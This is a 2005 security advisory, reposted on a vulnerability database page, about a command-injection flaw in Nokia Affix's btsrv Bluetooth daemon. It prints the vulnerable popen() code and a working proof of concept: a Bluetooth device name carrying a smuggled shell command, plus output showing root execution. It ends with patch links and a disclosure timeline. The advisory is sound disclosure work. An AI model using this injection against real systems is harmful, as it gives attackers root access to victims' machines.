Lucene search

K

DMA-2005-0826a.txt

🗓️ 28 Aug 2005 00:00:00Reported by Kevin FinisterreType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 22 Views

Nokia Affix Bluetooth vulnerability in btsrv.

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`DMA[2005-0826a] - 'Nokia Affix Bluetooth btsrv poor use of popen()'  
Author: Kevin Finisterre  
Vendor: http://www-nrc.nokia.com/affix/, http://affix.sourceforge.net  
Product: 'affix'  
References:   
http://www.digitalmunition.com/DMA[2005-0826a].txt  
  
Description:   
Affix is a Bluetooth Protocol Stack for Linux that was developed by the Nokia Research Center in   
Helsinki and released under GPL. Affix supports the core Bluetooth protocols like HCI, L2CAP 1.1,   
L2CAP 1.2, RFCOMM, SDP and various Bluetooth profiles. Affix consists of 'affix-kernel' which   
provides kernel modules and 'affix' which provides control tools, libraries, and server daemons.  
  
Although Nokia believes that Affix is an useful piece of software, please bear in mind that it is   
not an official Nokia product, but a result of the research activity of Nokia Research Center.  
  
The following code snippet was found in affix-3.2.0/daemon/btsrv.c:  
  
int event_pin_code_request(struct PIN_Code_Request_Event *evt, int devnum)  
{  
...  
  
err = HCI_RemoteNameRequest(fd, &dev, name);  
if (err) {  
BTDEBUG("Name request failed: %s", hci_error(err));  
...  
sprintf(cmdline, "/etc/affix/btsrv-gui pin \"%s\" %s", name, bda2str(&evt->bda));  
DBPRT("cmdline: [%s]", cmdline);  
fp = popen(cmdline, "r");  
if (!fp) {  
BTERROR("popen() failed");  
goto err;  
}  
err = fscanf(fp, "%s", pin);  
if (err == EOF) {  
BTERROR("fscanf() failed");  
pclose(fp);  
goto err;  
}  
  
Exploitation of this bug is easier than the bluez variation of the same attack. When exploiting   
bluez, previous population of the bluetooth name cache is required. On Affix however the call to   
HCI_RemoteNameRequest() makes this an instant exploit regardless of the name cache.   
  
The btsrv daemon should obviously be started.  
root@animosity:~# btsrv  
btsrv: main: btsrv started [Affix 3.2.0].  
btsdpd: main: btsdpd Affix 3.2.0 started.  
btsrv: start_service: Bound service Dialup Networking to port 1  
btsrv: start_service: Bound service Dialup Networking Emulation to port 2  
btsrv: start_service: Bound service Fax Service to port 3  
btsrv: start_service: Bound service LAN Access to port 4  
btsrv: start_service: Bound service OBEX File Transfer to port 5  
btsrv: start_service: Bound service OBEX Object Push to port 6  
  
As an example I will use my Ipaq 2215 to attack an Affix box. First I set the bluetooth name of   
my device to ";/usr/bin/id>/tmp/ooooo;"   
  
Next I start the attack by opening the bluetooth manager, clicking tools and going to Paired   
devices. Next I click Add, search for the target host and then double tap it. When prompted for  
a pin code I type in any random pin code and press enter.   
  
After a few moments I get an "Authentication failed!" message.  
  
On the screen where btsrv was started I see the following error which indicates an attack is   
in progress.   
  
Traceback (most recent call last):  
File "/etc/affix/btsrv-gui", line 106, in ?  
pin = t.go("Connection from %s [%s]" % (sys.argv[2], sys.argv[3]))  
IndexError: list index out of range  
sh: : command not found  
btsrv: event_pin_code_request: fscanf() failed  
  
Looking in /tmp on the target device shows successful exploitation.   
  
root@animosity:~# ls -al /tmp/ooooo  
-rw-r--r-- 1 root root 134 2005-08-26 16:47 /tmp/ooooo  
root@animosity:~# cat /tmp/ooooo  
uid=0(root) gid=0(root) groups=0(root)  
  
Feel free to get creatitve with this... http://www.digitalmunition.com/BluezHCIDpwned.txt   
  
Official patches for Affix can be found at http://affix.sourceforge.net  
http://affix.sourceforge.net/patch_btsrv_affix_3_2_0  
http://affix.sourceforge.net/patch_btsrv_affix_2_1_2  
  
Timeline:  
08/06/2005 bluez 2.19 stomps my Affix bug and reveals that *someone* borrowed bad code again!  
08/18/2005 *sigh* I guess I should tell Nokia about the bug now.  
08/22/2005 Carlos.Chinea from nokia responds that he will "look to it asap and fix it also asap".  
08/26/2005 btsrv popen() call patch released  
  
Outtakes:  
"no, they copied from us.." - bluez  
"As far as I know, we didn't borrow code...So I guess they did then" - affix  
  
-KF  
  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
28 Aug 2005 00:00Current
7.4High risk
Vulners AI Score7.4
22
.json
Report